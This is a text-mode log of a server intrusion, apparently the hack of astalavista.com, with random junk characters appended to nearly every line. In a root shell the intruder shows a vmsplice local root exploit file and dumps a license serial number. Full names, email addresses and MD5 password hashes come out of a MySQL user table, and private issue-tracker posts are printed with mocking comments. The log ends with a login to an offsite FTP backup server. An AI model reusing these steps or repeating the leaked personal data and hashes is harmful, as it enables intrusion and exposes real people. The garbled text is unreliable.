drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system1 |. }( @& \$ e" \, i! J' L
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history, h7 M1 @4 {% y- d/ o" B
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
% D" Z; P4 j5 G, L* P* V-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile0 L; f5 N6 W4 |7 x5 Z
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc5 ]) j/ z6 t0 o8 I3 T; I" t
drwx–x–x 3 com com 4096 Jan 29 2008 domains$ z+ g) \! G& U% C! |
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
0 e" K% r! F: `, \9 s+ Ndrwxrwx— 3 com mail 4096 Jan 6 19:24 imap0 v! P. R& z, ` w% d7 y
-rw——- 1 com com 69 Nov 18 2008 .lesshst
* e- M t/ ]! b4 A$ j6 P; udrwx—— 2 com com 4096 Sep 24 2007 mail
9 l6 j f' q7 S9 \" H/ U0 H3 Z-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history$ c# o5 G3 _! X' i/ C) E
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp4 b; h( R/ m4 |4 u
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html1 ^8 T8 P# z H7 d+ a
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow E" i! ?' r& A. b3 Z& |
drwx—— 2 com com 4096 Aug 26 2008 .ssh* x. i; B+ }* m; \: O8 @+ g2 z: Q
-rwx—— 1 com com 8515 Feb 10 2008 t
9 ~9 j9 N5 S8 H$ Y1 i-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c+ E- U a' |& ~& f `
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp) t7 R. O" H9 d9 h6 _& X' Q
-rw-rw-r– 1 com com 617 May 20 2008 .toprc% Q, Q1 D$ _0 }
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
* O7 V# {; h5 S, q4 Q0 v-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
; @2 i5 d: W8 `' @0 h. Y; m4 V-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc& Q$ ^4 `) E9 W& t, {
5 E7 @4 {7 q. d) c/ ]sh-3.2# head t.c. J/ W- }# f% h2 n2 m4 q" W
/* |9 a4 o% R. x2 O4 a" l7 f
* jessica_biel_naked_in_my_bed.c) j! O" P( t8 A+ x
*
! K. }6 D6 {0 [8 V6 n* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
7 x" m( f( _3 C5 c* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.( V e$ ]& n' a Y
* Stejnak je to stare jak cyp a aj jakesyk rozbite.8 n, U/ `" u$ n; W1 I, j
*
" n m3 R# b% }2 K* Linux vmsplice Local Root Exploit- H' T X, A3 e4 F
* By qaaz. V7 o, ^! S* }# ~$ {0 J
*
+ S! P- |1 a7 Z4 Z: U2 |0 N' Z2 G! ?: S) D! s( V# B" L
sh-3.2# cd /
2 X S, J' h" j9 lsh-3.2# ls -la
2 `/ Q' ?0 L$ itotal 360) q; x. ]' r: T
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .8 t- m e' E3 C" c
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
2 r" c& X' { b: b$ `-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
4 n' I# j6 |; G+ a-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
9 |5 a. d; e: `; y. D, G) |-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db" M7 s' d# f# O
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck: ?. C5 k3 d/ x! v: i6 `. |6 u; |
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
6 q+ C! ?/ x& _. rdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
/ `: G: x- ]6 P1 r# `drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
) a2 z$ F W s; z; Q% [drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
! B, P2 w4 {6 S" @0 wdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev" `1 R# s# d/ U
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc8 X i& U4 {' k# q) h' p
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
* s4 F* F( T: \6 f-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
/ }) n, ]$ \6 {8 T# [drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
8 m3 Y, o0 q/ l. a6 E2 fdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
; Q2 j8 u& X5 E3 q+ Jdrwx—— 2 root root 16384 Sep 11 2007 lost+found0 H' x: |# \% V0 J! m' s* M
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media1 I0 ^$ g9 x0 p1 i0 L. T8 |
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc& ?0 S) g. U' o$ d4 L
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt8 r Q( I L& T/ g% {
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
9 s9 M: h4 @& Sdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
9 `$ N: y( F& f+ |& h( z9 cdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
3 A7 g" b/ j% ~: I+ G0 E. vdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
" ~8 K' o5 L# o* u4 Zdrwxr-x— 15 root root 4096 Jun 4 08:40 root
8 H* f- e9 w" |; v! Idrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
/ } S; S6 l& X! sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
) g0 S1 `+ |5 Ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
1 o4 t- @9 M. O( u* @/ l& bdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys! `! v- i8 W+ d! K4 N
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
4 o/ J6 _+ q- A! l! Jdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
# W' g" j+ K% x" m/ F1 |6 B* vdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var( U* m! ~4 A8 R0 Z8 G) {+ i/ f) c
Q" a; P# @' s9 _8 S$ r
sh-3.2# cd opt" e. j3 d# a4 X1 |8 x
sh-3.2# ls -la
7 p2 t+ z- I* }$ f+ u2 ^/ f& Vtotal 20. K7 F2 f- t# F5 q
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .9 X) C; f( l4 H' ]/ c
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! H; e( j5 i8 N" Z5 A$ U+ T$ jdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws, C% x$ Q7 `+ \
$ {4 r1 I, H! d
sh-3.2# cd lsws/
0 b9 h7 i" m z9 ?+ Hsh-3.2# ls -la7 p3 a) Q% Z* g6 ?$ `& M2 \4 n
total 108
$ w% l4 u0 n9 s, r" idrwxr-xr-x 15 root root 4096 Mar 20 2008 ., H! }/ K$ Y9 n0 \+ H. A8 _
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
% A" y6 Z- @4 u0 o {drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons0 R8 Y. z f! z8 g* z/ _- J
drwxr-xr-x 13 root root 4096 May 29 15:10 admin, E+ E9 ^! N! v% t6 _" C5 {) h9 @. F
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate8 Z \0 t9 c9 ], T4 T5 G/ k
drwxr-xr-x 2 root root 4096 May 29 15:10 bin* I# F! u) |" y* E! J4 ~' T+ G9 q
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
5 [" s- |4 j6 X% F4 `drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT" M. B: [) ?7 B. U9 n
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
5 v+ h3 R7 R# Ndrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin# }- P6 h! d+ I% c5 [8 v( g. s. F
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib- X# a. x1 j+ O- c% R$ d& W
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE& a$ T) q# ^' b4 B0 b
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
& N8 e; [% L: }; e4 f5 ~2 w-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL- }7 p5 ]$ d$ @0 _
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
. n7 e8 s( G4 Z: e! m3 B0 mdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
1 R! U3 Z5 o5 a* J3 Hdrwxr-xr-x 2 root root 4096 Mar 20 2008 php$ q( m* l% @- C( h. ` n* ]$ O
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
! G4 B: e6 T) v# ^- `9 ndrwxr-xr-x 3 root root 4096 Mar 20 2008 share
4 A" E* E: G8 J: Q-rw-r–r– 1 root root 6 May 29 15:10 VERSION
5 M2 S2 H3 q& g2 L3 k0 J- D9 g# `& `* k7 d) B4 g7 b
sh-3.2# cd conf( B7 I* w: a/ `. Y
sh-3.2# ls -la! R& W" ^* N0 N
total 48
5 h$ t8 d9 t7 V' ~drwx—— 4 apache apache 4096 Jun 3 02:43 .
; q; g2 _" y2 B) d+ Z1 t3 Zdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..' r7 _( T) u6 |. f
drwx—— 2 apache apache 4096 Mar 20 2008 cert5 Y# c4 O% V) h
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml6 u, D" [% L- l" V: Y: [
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak* r+ F" H: X+ M: O
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
1 C F" ]- S& g# b% a; B-rw——- 1 apache apache 256 May 29 15:10 license.key
- E/ t5 q2 A7 s-rw——- 1 apache apache 256 Mar 21 2008 license.key.old$ A' M5 R! p, ~5 i) B; N- @
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties+ f- }+ `/ I, E( n) w
-rw——- 1 apache apache 20 May 29 15:10 serial.no
0 A H4 i/ `( B8 [; |+ m& @6 L) Odrwx—— 2 apache apache 4096 Mar 20 2008 templates6 d' {" `7 q" I" ?
5 V2 y5 d. x3 C
sh-3.2# cat serial.no
) ^7 z0 f8 B( u* X3 RIbDl-oVsO-CKqL-wVRa7 }+ v5 s R; H$ f
/ B$ J8 A% V" b5 b: U
sh-3.2# mysql. c' g( P, q S' {/ F
Welcome to the MySQL monitor. Commands end with ; or \g.; ^! {" K _ G+ D0 S
Your MySQL connection id is 286844
, M! K5 o1 X. S7 ~+ N0 ?3 FServer version: 5.0.45-community-log MySQL Community Edition (GPL): F0 _% b( d+ V" r7 t% m$ S
7 m3 A ~, r+ L% W( lType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 R g, t3 Y u# ]5 V5 j
" i) S) x* V3 M& \mysql> show databases;
) ^* `) k6 x2 r4 Z# A# N+———————–+/ T+ A6 Z5 _. x- @
| Database |
% S3 m$ f9 x2 j( V" o9 _+———————–+
6 B% R4 u2 f5 a& S, A7 q* B| information_schema |
8 B! Q7 A4 }7 y N9 o; J| astanet_ads |
5 b# i" i2 y4 a| astanet_mailing_lists |
]0 k* ^3 h# O5 L! X N| astanet_mediawiki |
3 T: ~& z- K; }7 ~| astanet_membersystem |
1 Z9 z6 w, \7 e, M: W| com_contrexx |5 z! }* V2 b, W4 @# O- M
| com_contrexx2 |2 u$ p- @+ }& k2 K" j
| com_contrexx2_live |: f B" g% R8 H4 p! ?9 d
| da_roundcube |
1 N, J% `0 `( u: h# V2 @7 T _| dolphin |
5 x4 J9 Z. R6 P3 j| ideapool |& @' Y9 t7 o3 W) H
| mysql |
6 I5 v1 T, n, A& T& b: f# Z3 E+ O! j| test |
! D6 X2 ^2 S$ n. g) L. V" i9 p* S, T| yourmaster |( j& u A4 Q: G- P: F a
+———————–+
: I! q) p' |! r6 n/ J( a) S14 rows in set (0.00 sec)
- C1 g- R' n2 C9 g! G
, h7 l4 u* G8 e2 Nmysql> use ideapool' l5 M( d* S% ~; e1 K8 B
Database changed
' Q2 L) F" {$ I, Ymysql> show tables; e) s. n6 z* r0 h' o
+———————————–+* s- N8 B& h) y8 C; _ x
| Tables_in_ideapool |
+ ?) @ {: S+ S3 i+———————————–+# r6 W$ p. f2 r( }/ i) \$ _9 N$ G, k& M$ m
| eventum_columns_to_display |
1 N- r% [3 J O| eventum_custom_field |
k2 u& @; V: ?' _. {| eventum_custom_field_option |; F: h$ J, F6 ] Z2 B
| eventum_custom_filter |
5 R5 T- o" P, {, o1 [| eventum_customer_account_manager |
% b5 M% W' w! _9 ]4 B| eventum_customer_note |
% j$ i' }4 d( T: d6 j| eventum_email_account |( i6 k0 F0 F+ u, q7 Q4 U5 D2 l
| eventum_email_draft |: C+ J! C. p. y8 M+ u. T- @
| eventum_email_draft_recipient |
$ i! z- e5 ?) G7 x| eventum_email_response |
2 G/ X1 t" x& G b( l| eventum_faq |6 H% x- m- H5 }& f# x
| eventum_faq_support_level |
# R2 {! \2 @/ e ]$ Z9 W: w9 O8 m| eventum_group |
1 n. S' G+ x. k: t| eventum_history_type |6 n) u% u1 h' z9 b
| eventum_irc_notice |
+ a2 }8 y0 j: w' p. H8 Y6 A' I| eventum_issue |
3 T! z' m. C) M3 [. G& L| eventum_issue_association |5 Q* D+ f5 h3 ]6 f f; L, ~
| eventum_issue_attachment |
5 a1 |# _" V4 c8 o| eventum_issue_attachment_file |
; G8 C& ^7 v" T" B1 V; A| eventum_issue_checkin |
4 Q1 ~5 m$ `6 p: [3 u/ \| eventum_issue_custom_field |
) w! j: N S) i" `: v| eventum_issue_history |" w+ Q8 D! ~! Y! I
| eventum_issue_quarantine |8 d6 a7 E3 ?& v2 q# q
| eventum_issue_requirement |
$ o; i7 q; w- t| eventum_issue_user |6 F( I) L4 u D _
| eventum_issue_user_replier |# ^) e2 l6 r3 n( {" ?8 _; E9 [
| eventum_link_filter |) @& k8 d! c8 d- [- b+ Q9 q- O0 h
| eventum_mail_queue |4 U1 Q O4 p* m7 e g
| eventum_mail_queue_log |# |6 O# W% d7 S/ i i
| eventum_news |
2 S4 H9 G0 L7 o( {2 e# T' O| eventum_note |9 `6 P% D; K4 V4 ]8 y: Q
| eventum_phone_support |
" I: g7 @' K" x! {! w% U, s| eventum_project |* O. w% F Z0 c6 O( W- V
| eventum_project_category | b* }/ v& X- c" V
| eventum_project_custom_field |
2 k+ b. P# u8 W( k" M1 Y| eventum_project_email_response |
3 O6 `7 Z2 [- ^" W/ \| eventum_project_field_display |7 v$ l5 E* Z/ X9 E6 ]8 j0 u9 r8 q
| eventum_project_group |' N9 O2 Y: B6 ?! H3 T' \5 ]
| eventum_project_link_filter |" i/ p# R3 R6 Y3 f7 w9 u" |/ u' ?
| eventum_project_news |. A7 K5 y1 f. g$ C
| eventum_project_phone_category |; v I3 A( e: N9 F
| eventum_project_priority |
3 _+ c2 c; U1 n* [| eventum_project_release |" D2 U* h+ _. w- T3 E2 T' w Q
| eventum_project_round_robin |
! v# r1 v6 j6 }& v8 O| eventum_project_status | C4 R0 a* [" a; ?3 Y, p% t
| eventum_project_status_date |
1 j8 ~' S4 l# z- S. C| eventum_project_user |
! B; m5 x3 j- p, I( S2 C| eventum_reminder_action |+ X/ ~3 d1 S) f' K( |
| eventum_reminder_action_list |
- A; g4 @( E7 O1 x| eventum_reminder_action_type |
! P6 F3 E5 S+ J' h! || eventum_reminder_field |# g, V6 \6 Z u$ }
| eventum_reminder_history |1 R& |) c, U# O* E
| eventum_reminder_level |& o+ c5 X2 A1 o/ m
| eventum_reminder_level_condition |9 V) \4 C$ O# {6 _+ T( a8 s
| eventum_reminder_operator |
6 P9 d8 l; P% M+ Q6 v# I7 m" h- D| eventum_reminder_priority |
, w" p. s( q8 _1 U4 R* ~# Q( o2 M# l| eventum_reminder_requirement |
0 _! U f' z1 i; o9 t( T3 y| eventum_reminder_triggered_action |. h) a) N- @" z( {7 J
| eventum_resolution |
" x# q! b* P: M; B Y8 t# h| eventum_round_robin_user |
8 y8 n: Z+ f( v( || eventum_search_profile |* P6 b" k3 F3 x/ t
| eventum_status |# Z% V! W5 P( g0 e* l
| eventum_subscription |: i1 ?/ v: H. p* m( b
| eventum_subscription_type |
& U7 O& L1 e( ? z. n| eventum_support_email |; }; y/ Q: Y/ z' r7 r8 L
| eventum_support_email_body |
' ~' h1 k5 m, F/ }| eventum_time_tracking |4 p- r5 Q7 Q& k }3 C- N# Y. `
| eventum_time_tracking_category |5 p1 I0 M2 c" G. Y6 d. Z" J
| eventum_user |6 |& i9 U( y1 R- Y! y$ E! @
+———————————–+
5 n* j6 r5 H: g: I& `3 k69 rows in set (0.00 sec)+ U% A: `2 @: y9 S- B: a4 @" Y
3 |" t6 {) \+ d# n3 q! Q( d
mysql> describe eventum_user;
7 Q" W% L5 ]2 z* f' p, Q& D+————————-+——————+——+—–+———————+—————-+' b* z* e) B5 S4 l* u
| Field | Type | Null | Key | Default | Extra |9 Y) b+ y6 Q2 }4 A
+————————-+——————+——+—–+———————+—————-+( C+ F& H% p9 z5 f" K
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
, [7 X7 l2 H) K: V3 n" F| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |* j* k' i f% L0 ^: v
| usr_customer_id | int(11) unsigned | YES | | NULL | |- q, \$ S4 I% Y9 V8 \
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |& @6 w S7 |: A: B4 T
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
6 B, M9 f7 s9 |6 g7 E3 R8 b3 r| usr_status | varchar(8) | NO | | active | |" B8 _6 J- Y2 N8 u5 ?1 G
| usr_password | varchar(32) | NO | | | |
- Z( Z) q: k/ i| usr_full_name | varchar(255) | NO | | | |
" t3 \- X3 s% C. Q+ j0 I| usr_email | varchar(255) | NO | UNI | | |
1 [7 q; A8 d, E* o8 r8 _' I/ j; d| usr_preferences | longtext | YES | | NULL | |4 j( e' B8 W+ i/ K
| usr_sms_email | varchar(255) | YES | | NULL | |3 w; D0 ~2 H5 J3 Z W9 ]( b5 t
| usr_clocked_in | tinyint(1) | YES | | 0 | | s9 Z& w: X( d# F& m& Y- j
| usr_lang | varchar(5) | YES | | NULL | |5 z' e9 m2 i" {9 V, @% X* L/ Y
+————————-+——————+——+—–+———————+—————-+
6 O9 b$ o$ O/ G! X13 rows in set (0.00 sec)
2 {1 b! I8 E$ ?8 s: e I/ I1 o! X3 E8 m& P8 p% w. g
mysql> select usr_full_name,usr_email,usr_password from eventum_user;% {. ~* u. B6 T$ K
+———————-+——————————-+———————————-+
& _4 j; p6 ^0 s7 W; N/ i| usr_full_name | usr_email | usr_password |
9 x# Q) k1 v1 L- S- R+———————-+——————————-+———————————-+1 C/ q! H3 ^: l0 w& J/ E
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
0 l: ]& O8 r) @* X) c* X| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
8 z, K$ v( }6 b* J9 Z+ P' _| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
: u# u% N* I& t4 w# f9 W| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |: q& m# I; n# }1 n
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |7 \2 m m: @% R* l: H' _4 Z* g8 ^* C6 J. Z
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |- v+ N) V0 r0 [6 F
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
& p. T- F' F. L( Z* o6 s% ]| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |' j6 G/ w1 w0 a) W
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |5 w4 B( x! T. T( j/ R
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
, o( j6 @. U; W2 H1 v( k| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |& y i: J* ]* G6 K- k
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
" N$ B' L9 Y1 r+ _2 c1 S& F| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
; C( o- k1 Q9 k5 k. c| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |/ K/ }; a5 |9 x) [5 w
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |& }+ J A5 c# H
+———————-+——————————-+———————————-+* {# E. Q' D( L8 S( R4 @8 s! R( }
15 rows in set (0.00 sec). ]5 M6 Q9 j i- |
6 R6 e# p* V6 s4 \$ v
mysql> select iss_description from eventum_issue where iss_id = 43;
+ e' a: I" F, V5 @6 d+ Z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
& y3 Q ~$ n( Q+ v) L| iss_description
) W& Z. J: I7 L4 }2 k3 [! N. l( Z|
/ z. P6 f, A: e+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% t3 k; l1 B- }5 r3 W* D/ w. F: B| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
3 l6 S" Z! R/ {' f5 j% qconnected for 90 mins… 120mins… so what i propose is something like:
% V$ E- t. ?$ t0 m: g# k$ L链接标记[url]http://www.surfthechannel.com/[/url]) I: ?* u+ B- r$ f% i/ h" K
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system/ T4 s5 S! I, b! k
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
) T/ o7 M4 @5 dbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
3 a/ ?6 S- b! l- Y( lif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
. y& c/ y, I& P
+ o4 D; M6 N" O3 h6 Y3 k. u3 ?1 {; q' VWe could also put advertisement during play on the flash video player itself… extra $$…: N" \- c( F/ d" q1 ^' q; l
9 f+ q* |8 W) U3 t
By sykadul |* W4 D6 s- X9 g$ e% `
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ f m% D1 W2 l* N+ z( M
1 row in set (0.00 sec)0 ]) u4 _2 H9 i. A* q5 b! m, ` b
6 r) X+ F" D- L- U* Z) f: A
// Money and extra $$ is all they care about. remember that.: P+ v5 k9 O& v$ P+ R% i
0 a* H$ _4 C5 `1 }# J' }% {. {+ J
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
/ V' b T6 {9 A8 D+————————+——————————————————————————————————————————————————————————————————————————————-+
0 V# k1 c: I1 ?0 G3 F" c+ i2 P| iss_summary | iss_description # I& i1 a( M$ P9 f: w
|
; F3 z9 L/ L6 z; f% k2 h2 G+————————+——————————————————————————————————————————————————————————————————————————————-+
" I6 K1 O* `! [( c% M| Forum for REAL EXPERTS | Hello,
) U4 p5 @3 A4 U8 |9 E8 |3 ?6 [0 X1 A4 I6 [
Ishtus and I,
. Z3 r i Q% z- n- d3 ?" G: W [
+ W0 F" C! M! V3 O! NCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
# t5 h" W( a' x m% H( DONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..6 j6 \% ~% k1 I" q4 L7 M$ O
. c! x, ? k( m. ^8 Z
One example a friend of mine from coresecurity.com!8 n; e. H) S" q/ R
5 P3 l. r _: f6 K& ]* O) xWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
2 ^) \1 p, S7 b% |" @ `2 I( G$ I8 e; h$ O3 Y7 Q& i
|
. [ ~0 f1 O5 C+————————+——————————————————————————————————————————————————————————————————————————————+: d5 d, e" x' i1 ]! X V
1 row in set (0.00 sec)
) h* E! D1 v# u# ^2 X( i, W/ e( {/ i& e% G: v
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…& U9 a8 X* U8 k( V/ q1 x# J
" U8 x o3 C9 J( G3 t% l2 }mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;7 r1 g8 ?8 B+ w2 v
+——————+———————————————————————————————+
5 C" x' ^7 C/ o* K* N+ L| iss_summary | iss_description |
3 A$ D# A- j2 m/ t' v) {+——————+———————————————————————————————+
- f" Y/ Q( o; o- c; m. E| Website guidance | Virtual Girl which guides you trought the website.2 M" c9 p k1 v3 I; p8 Q
/ i0 L4 t$ V. U0 p1 ]; A+ QWe need a girl with who you can ( talk )!!!
$ y, m! ]1 `/ ~3 j4 o% `; [5 Z/ x; XAlso for the News!
6 d: d6 ~5 h8 O( R# d9 dSo my suggestion is a girl who read you the news loud if you like!% F) i; L5 F. U' c( f
you can choose between read yourselfe or she read it for you or both!
5 ]. w2 S7 E! [; t0 u2 h
; G0 d2 Q: ?# c% X$ q" l5 BGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
1 h' @% |' X4 W/ z# n4 _6 J5 } B9 W3 @7 a" Z1 S% e$ z# A6 Q
Have a look on the example girls!!
% X1 w4 ~ S% I6 l& \3 Y
. ?' w, ~( Q8 z1 Z链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
^2 l; i: W4 `7 {$ O# B; E
% n3 P) h7 I* @# |, K) Xor that# T: S8 y1 q* Y, Y* v% f
) u; ^1 N+ Q0 _. b6 R. K
链接标记[url]http://www.yellostrom.de/[/url]% s; z) s5 @) w8 Y! d
: W8 i; w. K8 a" H. x8 v2 b|
( s* n4 u- P$ i5 ^/ }+ Z, [+——————+———————————————————————————————+
* A l5 T3 X2 m! f% `1 row in set (0.00 sec)
; ~% t1 D: d3 E- j& ]3 W) v o+ W4 v H. L
// ha ha., E8 _, ?' @6 s, B# Y* y4 f+ u
! ]4 g! ]9 [* a' H+ f+ T8 W
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
8 d) d, ` b1 U0 X) T# U/ p& m+————————–+———————————————————————————————————–+
. h C5 i+ K7 `* [% k4 s3 G| iss_summary | iss_description |* V+ N5 R1 n8 W$ y* ^' H
+————————–+———————————————————————————————————–+
3 u. D$ N2 U0 b2 U f5 x| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |& n' E% q# g$ d. P0 Z
+————————–+———————————————————————————————————–+* n. j9 d E3 q+ n: k/ _5 Q
1 row in set (0.00 sec)8 ]4 M- b* ~/ E& u/ Q1 W$ \
1 k: g! Q& K1 ~! T% f# j0 z
// LOL.
+ T, k& o' Z+ y/ n% J5 R
- E2 n5 l9 P2 I2 Y- Vmysql> exit6 `* b, N1 L3 Z) I9 Q
Bye
+ W9 B0 y4 t7 N8 y+ a' ^, H3 t) E4 {7 z2 Z
sh-3.2# ftp 212.254.194.163
0 G7 a& J2 {# |Connected to 212.254.194.163.
2 x% B7 d! S+ U4 F& c: f* o* x220 BackupCOM_VW FTP server ready.
. `3 u# I' s% X) b3 ?6 s( T504 AUTH: security mechanism ‘GSSAPI’ not supported.
+ G, {: t) F' _4 e$ j5 J504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
; V3 X/ P) D' W7 Q$ gKERBEROS_V4 rejected as an authentication type
; i" G8 g$ {0 w1 {Name (212.254.194.163:root): astalavista.com. k6 I4 Y2 g5 v" G8 ?
331 Password required for astalavista.com.
( ^" T8 I& f1 \$ b8 ]9 ~Password:
& Y+ \6 v) C8 p7 {& ~230 User astalavista.com logged in.+ }5 D4 L3 \, P$ a0 k
Remote system type is UNIX.
, T8 m0 e' L. U# u9 ]( T& hUsing binary mode to transfer files.% S1 S; U: P, f) W7 s
ftp> ls -la
" U1 T$ ~" F6 Y7 U. Y/ K$ E227 Entering Passive Mode (212,254,194,163,2,188)
9 f+ }% f1 z7 g" l. Z150 Opening BINARY mode data connection for ‘file list’.
$ Q5 y& [1 s: Y2 h. hdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com6 U$ D$ |+ @1 k; Y0 H" a6 k$ A) T, \1 l
226 Transfer complete.
S$ R, H% c# P. Yftp> cd astalavista.com# d- X# G6 y5 p
250 CWD command successful.
: T$ k- k- r, w- q# J4 T. aftp> ls -la9 f6 c6 v& ^8 \8 N
227 Entering Passive Mode (212,254,194,163,2,189)
4 E4 o+ w, g1 L' Z$ r& g150 Opening BINARY mode data connection for ‘file list’.9 R4 r3 N# y$ O, P* k6 M. O
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
- Q- L, K/ `; e! K" \. k5 X8 k-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
6 h# A9 r o- \7 Z C-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2- A+ @! ?8 ?& r
